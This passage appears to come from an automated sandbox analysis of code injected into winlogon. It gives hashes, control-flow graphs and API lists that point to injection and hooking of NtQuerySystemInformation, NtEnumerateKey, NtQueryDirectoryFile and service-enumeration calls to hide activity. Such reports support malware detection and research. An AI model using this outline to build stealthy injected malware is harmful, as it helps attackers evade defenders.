                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: cf0282bb4f48f30ffcba822019b823f7b8800bf24808c34562f9918938dd46bd
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 6F711976710A9086EB209FA6ECC879977A8F784B89F801163DE4D47B79EF79C944C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: 5beddea99a606811880e9ac37e0bf7976a19d7c1deaf2c6cb1d3b5cef6364cbc
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 8141AA641109CAE4FF08DBD4EDDA7D47725A704784FC084A3A50D12179AEBADF8DD351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 81 2d0165e5cb0-2d0165e5cd7 82 2d0165e5ceb-2d0165e5cf6 GetCurrentThreadId 81->82 83 2d0165e5cd9-2d0165e5ce8 81->83 84 2d0165e5cf8-2d0165e5cfd 82->84 85 2d0165e5d02-2d0165e5d09 82->85 83->82 86 2d0165e612f-2d0165e6146 call 2d0165e7ac0 84->86 87 2d0165e5d1b-2d0165e5d2f 85->87 88 2d0165e5d0b-2d0165e5d16 call 2d0165e5ae0 85->88 89 2d0165e5d3e-2d0165e5d44 87->89 88->86 92 2d0165e5d4a-2d0165e5d53 89->92 93 2d0165e5e15-2d0165e5e36 89->93 96 2d0165e5d9a-2d0165e5e0d call 2d0165e4690 call 2d0165e4630 call 2d0165e45f0 92->96 97 2d0165e5d55-2d0165e5d98 call 2d0165e8740 92->97 99 2d0165e5f9f-2d0165e5fb0 call 2d0165e763f 93->99 100 2d0165e5e3c-2d0165e5e5c GetThreadContext 93->100 109 2d0165e5e10 96->109 97->109 115 2d0165e5fb5-2d0165e5fbb 99->115 103 2d0165e5f9a 100->103 104 2d0165e5e62-2d0165e5e83 100->104 103->99 104->103 112 2d0165e5e89-2d0165e5e92 104->112 109->89 118 2d0165e5e94-2d0165e5ea5 112->118 119 2d0165e5f12-2d0165e5f23 112->119 116 2d0165e607e-2d0165e608e 115->116 117 2d0165e5fc1-2d0165e6018 VirtualProtect FlushInstructionCache 115->117 127 2d0165e609e-2d0165e60aa call 2d0165e4f70 116->127 128 2d0165e6090-2d0165e6097 116->128 121 2d0165e601a-2d0165e6024 117->121 122 2d0165e6049-2d0165e6079 call 2d0165e7a2c 117->122 125 2d0165e5f0d 118->125 126 2d0165e5ea7-2d0165e5ebc 118->126 123 2d0165e5f95 119->123 124 2d0165e5f25-2d0165e5f43 119->124 121->122 130 2d0165e6026-2d0165e6041 call 2d0165e4510 121->130 122->115 124->123 132 2d0165e5f45-2d0165e5f8c call 2d0165e3a80 124->132 125->123 126->125 133 2d0165e5ebe-2d0165e5f08 call 2d0165e3af0 SetThreadContext 126->133 145 2d0165e60af-2d0165e60b5 127->145 128->127 134 2d0165e6099 call 2d0165e4560 128->134 130->122 132->123 148 2d0165e5f90 call 2d0165e765d 132->148 133->125 134->127 146 2d0165e60f7-2d0165e6115 145->146 147 2d0165e60b7-2d0165e60f5 ResumeThread call 2d0165e7a2c 145->147 150 2d0165e6129 146->150 151 2d0165e6117-2d0165e6126 146->151 147->145 148->123 150->86 151->150
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: 5386dfe54a7a50d35eb2be07e6f988aad87b53fd4122ef09ab1729645e20a04d
                                                                                                            • Instruction ID: 827840bbf32c1ab4604c7a48a0d278e65cc8801cf0df14b7f3a30d8c4ea63e3b
                                                                                                            • Opcode Fuzzy Hash: 5386dfe54a7a50d35eb2be07e6f988aad87b53fd4122ef09ab1729645e20a04d
                                                                                                            • Instruction Fuzzy Hash: 06D19D76209B8885DB709B5AE89435AB7A0F7C8B88F500256EACD477B5DF3DCA51CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 153 2d0165e5250-2d0165e527c 154 2d0165e527e-2d0165e5286 153->154 155 2d0165e528d-2d0165e5296 153->155 154->155 156 2d0165e5298-2d0165e52a0 155->156 157 2d0165e52a7-2d0165e52b0 155->157 156->157 158 2d0165e52b2-2d0165e52ba 157->158 159 2d0165e52c1-2d0165e52ca 157->159 158->159 160 2d0165e52cc-2d0165e52d1 159->160 161 2d0165e52d6-2d0165e52e1 GetCurrentThreadId 159->161 162 2d0165e5853-2d0165e585a 160->162 163 2d0165e52ed-2d0165e52f4 161->163 164 2d0165e52e3-2d0165e52e8 161->164 165 2d0165e52f6-2d0165e52fc 163->165 166 2d0165e5301-2d0165e530a 163->166 164->162 165->162 167 2d0165e530c-2d0165e5311 166->167 168 2d0165e5316-2d0165e5322 166->168 167->162 169 2d0165e534e-2d0165e53a5 call 2d0165e5860 * 2 168->169 170 2d0165e5324-2d0165e5349 168->170 175 2d0165e53ba-2d0165e53c3 169->175 176 2d0165e53a7-2d0165e53ae 169->176 170->162 179 2d0165e53d5-2d0165e53de 175->179 180 2d0165e53c5-2d0165e53d2 175->180 177 2d0165e53b6 176->177 178 2d0165e53b0 176->178 177->175 181 2d0165e5426-2d0165e542a 177->181 184 2d0165e5430-2d0165e5436 178->184 182 2d0165e53f3-2d0165e5418 call 2d0165e79f0 179->182 183 2d0165e53e0-2d0165e53f0 179->183 180->179 181->184 193 2d0165e541e 182->193 194 2d0165e54ad-2d0165e54c2 call 2d0165e3e40 182->194 183->182 185 2d0165e5438-2d0165e5454 call 2d0165e4510 184->185 186 2d0165e5465-2d0165e546b 184->186 185->186 196 2d0165e5456-2d0165e545e 185->196 190 2d0165e546d-2d0165e548c call 2d0165e7a2c 186->190 191 2d0165e5495-2d0165e54a8 186->191 190->191 191->162 193->181 200 2d0165e54c4-2d0165e54cc 194->200 201 2d0165e54d1-2d0165e54da 194->201 196->186 200->181 202 2d0165e54ec-2d0165e553a call 2d0165e8df0 201->202 203 2d0165e54dc-2d0165e54e9 201->203 206 2d0165e5542-2d0165e554a 202->206 203->202 207 2d0165e5657-2d0165e565f 206->207 208 2d0165e5550-2d0165e563b call 2d0165e75c0 206->208 210 2d0165e56a3-2d0165e56ab 207->210 211 2d0165e5661-2d0165e5674 call 2d0165e4710 207->211 219 2d0165e563f-2d0165e564e call 2d0165e41e0 208->219 220 2d0165e563d 208->220 212 2d0165e56ad-2d0165e56b5 210->212 213 2d0165e56b7-2d0165e56c6 210->213 225 2d0165e5678-2d0165e56a1 211->225 226 2d0165e5676 211->226 212->213 216 2d0165e56d4-2d0165e56e1 212->216 217 2d0165e56cf 213->217 218 2d0165e56c8 213->218 222 2d0165e56e4-2d0165e5739 call 2d0165e8740 216->222 223 2d0165e56e3 216->223 217->216 218->217 230 2d0165e5652 219->230 231 2d0165e5650 219->231 220->207 232 2d0165e573b-2d0165e5743 222->232 233 2d0165e5748-2d0165e57e1 call 2d0165e4690 call 2d0165e45f0 VirtualProtect 222->233 223->222 225->207 226->210 230->206 231->207 238 2d0165e57e3-2d0165e57e8 GetLastError 233->238 239 2d0165e57f1-2d0165e5851 233->239 238->239 239->162
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 8690d158449b8bab1d0ea726d75a28fb1a1f16844745daff30852d95de4f148f
                                                                                                            • Instruction ID: ff4c9e394f4f633e6f1f47a6c809148161092db0380fabb132dcaef3393a161c
                                                                                                            • Opcode Fuzzy Hash: 8690d158449b8bab1d0ea726d75a28fb1a1f16844745daff30852d95de4f148f
                                                                                                            • Instruction Fuzzy Hash: 4C02B936219BC486EB60CB95E89435AF7A0F3C4794F504116EACE87BA9DF7EC954CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: c2e338edc5dde43fb8e82cd134809c79a1c2ddc2a18675da9b4e7e84532af290
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: 0D113026605B8183EF24DF91E888759B7B4F745B80F844127DA4D437A5EF3EC944C744
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 31662377-0
                                                                                                            • Opcode ID: e557402e9dd73df416ea533ec671a1600cb4b40425ccbc5a1acba7d83a866da0
                                                                                                            • Instruction ID: 919a1b6c2e3fa8f9fed85d43b09728acdc6dae48b1b9fd9c76b8407471fff654
                                                                                                            • Opcode Fuzzy Hash: e557402e9dd73df416ea533ec671a1600cb4b40425ccbc5a1acba7d83a866da0
                                                                                                            • Instruction Fuzzy Hash: 36312A22619AC481EF30DB55E89835EE6A4F7887C4F900516F6CE467B9DF7ECB408B04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandleLibraryLoadPath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3330075603-0
                                                                                                            • Opcode ID: 07b1fef9b75676cc8ab7ce167cd629578b86cc052029fc02db47c51d3d35c015
                                                                                                            • Instruction ID: 6404377c290bac5c135d6157a5486d4f5feab7838e636db9dc56e7921b1ad9b1
                                                                                                            • Opcode Fuzzy Hash: 07b1fef9b75676cc8ab7ce167cd629578b86cc052029fc02db47c51d3d35c015
                                                                                                            • Instruction Fuzzy Hash: 041184706107C141FF2097E0ADCD759A791A754745FC004ABD91E866B6EF3ACE84C600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3733156554-0
                                                                                                            • Opcode ID: 8f375e4fb9d4ea77231e8d2b36d888ad2401ffeed29037c9415508a6c378e2d6
                                                                                                            • Instruction ID: 403759c975e8939f7a96540f258f7a09ca7a55f223a7a15aaf64dd259946e79d
                                                                                                            • Opcode Fuzzy Hash: 8f375e4fb9d4ea77231e8d2b36d888ad2401ffeed29037c9415508a6c378e2d6
                                                                                                            • Instruction Fuzzy Hash: 19F0D626219B8481DB30DB45E89575AA7A0E3C8BD8F940116FA8D07B79CF3DCA91CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 314 2d0165829a0-2d016582a0b call 2d016580f34 * 4 323 2d016582a11-2d016582a14 314->323 324 2d016582c23 314->324 323->324 325 2d016582a1a-2d016582a1d 323->325 326 2d016582c25-2d016582c41 324->326 325->324 327 2d016582a23-2d016582a26 325->327 327->324 328 2d016582a2c-2d016582a4a VirtualAlloc 327->328 328->324 329 2d016582a50-2d016582a74 call 2d016580d6c 328->329 332 2d016582aa3-2d016582aaa 329->332 333 2d016582a76-2d016582aa1 call 2d016580d6c 329->333 335 2d016582b4a-2d016582b51 332->335 336 2d016582ab0-2d016582abd 332->336 333->332 337 2d016582c04-2d016582c21 335->337 338 2d016582b57-2d016582b6e 335->338 336->335 340 2d016582ac3-2d016582ad1 LoadLibraryA 336->340 337->326 338->337 341 2d016582b74 338->341 342 2d016582ad3-2d016582add 340->342 343 2d016582b35-2d016582b3d 340->343 346 2d016582b7a-2d016582b8f 341->346 347 2d016582ae0-2d016582ae4 342->347 343->340 344 2d016582b3f-2d016582b44 343->344 344->335 350 2d016582b91-2d016582ba2 346->350 351 2d016582bf3-2d016582bfe 346->351 348 2d016582b32 347->348 349 2d016582ae6-2d016582aea 347->349 348->343 352 2d016582aec-2d016582b13 349->352 353 2d016582b15-2d016582b1f 349->353 355 2d016582bad-2d016582bb1 350->355 356 2d016582ba4-2d016582bab 350->356 351->337 351->346 357 2d016582b25-2d016582b30 352->357 353->357 359 2d016582bbc-2d016582bc0 355->359 360 2d016582bb3-2d016582bba 355->360 358 2d016582be0-2d016582bf1 356->358 357->347 358->350 358->351 361 2d016582bd2-2d016582bd6 359->361 362 2d016582bc2-2d016582bd0 359->362 360->358 361->358 363 2d016582bd8-2d016582bdb 361->363 362->358 363->358
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3363718104.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016580000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3550616410-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: f621cb290c08b2b46b1e683fa066f38823c56fcd4ce4b08d2a6cfbd1d588fe07
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 9B61236270229087EB68CF96D89877DB799FB04BD4F84C426DA1D07BA5DB38EC52C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 000002D0165E1650: GetProcessHeap.KERNEL32 ref: 000002D0165E165B
                                                                                                              • Part of subcall function 000002D0165E1650: HeapAlloc.KERNEL32 ref: 000002D0165E166A
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DA
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1707
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1721
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1741
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E175C
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E177C
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1797
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17B7
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E17D2
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17F2
                                                                                                            • Sleep.KERNEL32 ref: 000002D0165E1C43
                                                                                                            • SleepEx.KERNEL32 ref: 000002D0165E1C49
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E180D
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E182D
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1848
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1868
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E1883
                                                                                                              • Part of subcall function 000002D0165E1650: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E18A3
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E18BE
                                                                                                              • Part of subcall function 000002D0165E1650: RegCloseKey.ADVAPI32 ref: 000002D0165E18C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1534210851-0
                                                                                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                            • Instruction ID: 5dc8fc1c7f53c2855e68788d676a44e8de49ae7f1874ae2914d3f5803c86c972
                                                                                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                            • Instruction Fuzzy Hash: 5D31E36930168591FF709FB6DEC939EB3A6AB44BC2FC45023DE0D876B6DE15CE508250
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 556 2d0167329a0-2d016732a0b call 2d016730f34 * 4 565 2d016732c23 556->565 566 2d016732a11-2d016732a14 556->566 567 2d016732c25-2d016732c41 565->567 566->565 568 2d016732a1a-2d016732a1d 566->568 568->565 569 2d016732a23-2d016732a26 568->569 569->565 570 2d016732a2c-2d016732a4a VirtualAlloc 569->570 570->565 571 2d016732a50-2d016732a74 call 2d016730d6c 570->571 574 2d016732aa3-2d016732aaa 571->574 575 2d016732a76-2d016732aa1 call 2d016730d6c 571->575 577 2d016732ab0-2d016732abd 574->577 578 2d016732b4a-2d016732b51 574->578 575->574 577->578 582 2d016732ac3-2d016732ad1 577->582 580 2d016732b57-2d016732b6e 578->580 581 2d016732c04-2d016732c21 578->581 580->581 583 2d016732b74 580->583 581->567 589 2d016732ad3-2d016732add 582->589 590 2d016732b35-2d016732b3d 582->590 585 2d016732b7a-2d016732b8f 583->585 587 2d016732bf3-2d016732bfe 585->587 588 2d016732b91-2d016732ba2 585->588 587->581 587->585 593 2d016732ba4-2d016732bab 588->593 594 2d016732bad-2d016732bb1 588->594 595 2d016732ae0-2d016732ae4 589->595 590->582 591 2d016732b3f-2d016732b44 590->591 591->578 596 2d016732be0-2d016732bf1 593->596 597 2d016732bb3-2d016732bba 594->597 598 2d016732bbc-2d016732bc0 594->598 599 2d016732b32 595->599 600 2d016732ae6-2d016732aea 595->600 596->587 596->588 597->596 601 2d016732bd2-2d016732bd6 598->601 602 2d016732bc2-2d016732bd0 598->602 599->590 603 2d016732b15-2d016732b1f 600->603 604 2d016732aec-2d016732b13 600->604 601->596 606 2d016732bd8-2d016732bdb 601->606 602->596 605 2d016732b25-2d016732b30 603->605 604->605 605->595 606->596
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3367386735.000002D016730000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016730000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016730000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 69b96e43718376f6964ff8b5aed6cffbc896fd5f412ec1af6c670a2741242d08
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 8C612222701690C3EF68CF99D89476DB391FB04B94F84C222DA2D0B7A5EB38EC52D700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 454 2d0166729a0-2d016672a0b call 2d016670f34 * 4 463 2d016672c23 454->463 464 2d016672a11-2d016672a14 454->464 465 2d016672c25-2d016672c41 463->465 464->463 466 2d016672a1a-2d016672a1d 464->466 466->463 467 2d016672a23-2d016672a26 466->467 467->463 468 2d016672a2c-2d016672a4a VirtualAlloc 467->468 468->463 469 2d016672a50-2d016672a74 call 2d016670d6c 468->469 472 2d016672a76-2d016672aa1 call 2d016670d6c 469->472 473 2d016672aa3-2d016672aaa 469->473 472->473 475 2d016672ab0-2d016672abd 473->475 476 2d016672b4a-2d016672b51 473->476 475->476 480 2d016672ac3-2d016672ad1 475->480 478 2d016672b57-2d016672b6e 476->478 479 2d016672c04-2d016672c21 476->479 478->479 481 2d016672b74 478->481 479->465 487 2d016672b35-2d016672b3d 480->487 488 2d016672ad3-2d016672add 480->488 483 2d016672b7a-2d016672b8f 481->483 485 2d016672bf3-2d016672bfe 483->485 486 2d016672b91-2d016672ba2 483->486 485->479 485->483 491 2d016672ba4-2d016672bab 486->491 492 2d016672bad-2d016672bb1 486->492 487->480 489 2d016672b3f-2d016672b44 487->489 493 2d016672ae0-2d016672ae4 488->493 489->476 494 2d016672be0-2d016672bf1 491->494 495 2d016672bb3-2d016672bba 492->495 496 2d016672bbc-2d016672bc0 492->496 497 2d016672ae6-2d016672aea 493->497 498 2d016672b32 493->498 494->485 494->486 495->494 499 2d016672bd2-2d016672bd6 496->499 500 2d016672bc2-2d016672bd0 496->500 501 2d016672b15-2d016672b1f 497->501 502 2d016672aec-2d016672b13 497->502 498->487 499->494 503 2d016672bd8-2d016672bdb 499->503 500->494 504 2d016672b25-2d016672b30 501->504 502->504 503->494 504->493
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3365813918.000002D016670000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016670000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016670000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: b6e01f60ad4133ef139cb0c1c0da6606ab56af6d46f7cd633a6e7c8fcd2936e5
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: B461046270129087EBA8CF95D89476DB395FB44F9CF84C42ADA1D077A5DB38EC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3368283815.000002D016790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016790000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d016790000_winlogon.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: a5c696ece6840d160d3342222ed5ad3df6fa06ee52d2d941190d07041a3bb003
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: 8C61256272129087EF58EF95D89476D73E1FB04BA8F84C226DA2D077A5EA38DC52C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 505 2d0166d29a0-2d0166d2a0b call 2d0166d0f34 * 4 514 2d0166d2a11-2d0166d2a14 505->514 515 2d0166d2c23 505->515 514->515 517 2d0166d2a1a-2d0166d2a1d 514->517 516 2d0166d2c25-2d0166d2c41 515->516 517->515 518 2d0166d2a23-2d0166d2a26 517->518 518->515 519 2d0166d2a2c-2d0166d2a4a VirtualAlloc 518->519 519->515 520 2d0166d2a50-2d0166d2a74 call 2d0166d0d6c 519->520 523 2d0166d2a76-2d0166d2aa1 call 2d0166d0d6c 520->523 524 2d0166d2aa3-2d0166d2aaa 520->524 523->524 525 2d0166d2b4a-2d0166d2b51 524->525 526 2d0166d2ab0-2d0166d2abd 524->526 528 2d0166d2c04-2d0166d2c21 525->528 529 2d0166d2b57-2d0166d2b6e 525->529 526->525 530 2d0166d2ac3-2d0166d2ad1 526->530 528->516 529->528 532 2d0166d2b74 529->532 538 2d0166d2b35-2d0166d2b3d 530->538 539 2d0166d2ad3-2d0166d2add 530->539 533 2d0166d2b7a-2d0166d2b8f 532->533 536 2d0166d2b91-2d0166d2ba2 533->536 537 2d0166d2bf3-2d0166d2bfe 533->537 541 2d0166d2bad-2d0166d2bb1 536->541 542 2d0166d2ba4-2d0166d2bab 536->542 537->528 537->533 538->530 544 2d0166d2b3f-2d0166d2b44 538->544 543 2d0166d2ae0-2d0166d2ae4 539->543 546 2d0166d2bbc-2d0166d2bc0 541->546 547 2d0166d2bb3-2d0166d2bba 541->547 545 2d0166d2be0-2d0166d2bf1 542->545 548 2d0166d2ae6-2d0166d2aea 543->548 549 2d0166d2b32 543->549 544->525 545->536 545->537 550 2d0166d2bd2-2d0166d2bd6 546->550 551 2d0166d2bc2-2d0166d2bd0 546->551 547->545 552 2d0166d2aec-2d0166d2b13 548->552 553 2d0166d2b15-2d0166d2b1f 548->553 549->538 550->545 555 2d0166d2bd8-2d0166d2bdb 550->555 551->545 554 2d0166d2b25-2d0166d2b30 552->554 553->554 554->543 555->545
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000016.00000002.3366586032.000002D0166D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D0166D0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_22_2_2d0166d0000_winlogon.jbxd
